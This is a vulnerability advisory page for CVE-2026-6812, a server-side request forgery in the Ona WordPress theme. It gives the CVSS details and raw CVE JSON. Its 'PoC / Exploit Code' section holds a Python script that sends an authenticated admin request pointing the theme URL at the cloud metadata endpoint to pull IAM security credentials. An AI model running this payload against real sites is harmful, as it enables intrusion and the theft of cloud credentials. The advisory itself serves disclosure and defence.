Security Vulnerability Report
中文
CVE-2026-6812 CVSS 4.4 MEDIUM

CVE-2026-6812

Published: 2026-05-02 06:16:04
Last Modified: 2026-05-05 19:16:18
Source: [email protected]

Description

The Ona theme for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.26 via the ona_activate_child_theme. This makes it possible for authenticated attackers, with administrator-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.

CVSS Details

CVSS Score
4.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WordPress Ona Theme <= 1.26

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Exploit Title: WordPress Ona Theme SSRF via ona_activate_child_theme # Date: 2026-05-02 # Vulnerable Parameter: URL used in theme activation target_url = "http://target-wordpress-site.com/wp-admin/admin.php" admin_cookie = "wordpress_logged_in_xxx=...; wordpress_sec_xxx=..." # Malicious internal URL to query (e.g., AWS metadata) payload_url = "http://169.254.169.254/latest/meta-data/iam/security-credentials/" data = { "action": "ona_activate_child_theme", "theme_url": payload_url, "nonce": "wp_nonce_value" # Requires valid admin nonce } headers = { "Cookie": admin_cookie, "Content-Type": "application/x-www-form-urlencoded" } # Send the request response = requests.post(target_url, data=data, headers=headers) print(f"Status Code: {response.status_code}") print("Response body may contain leaked info or trigger timing attacks")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-6812", "sourceIdentifier": "[email protected]", "published": "2026-05-02T06:16:04.337", "lastModified": "2026-05-05T19:16:18.390", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Ona theme for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.26 via the ona_activate_child_theme. This makes it possible for authenticated attackers, with administrator-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/ona/tags/1.23.2/inc/admin/theme-admin.php#L688", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/ona/tags/1.23.2/inc/admin/theme-admin.php#L694", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/ona/trunk/inc/admin/theme-admin.php#L688", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/ona/trunk/inc/admin/theme-admin.php#L694", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0acb365c-b5f2-4377-875b-69278a8ff96e?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.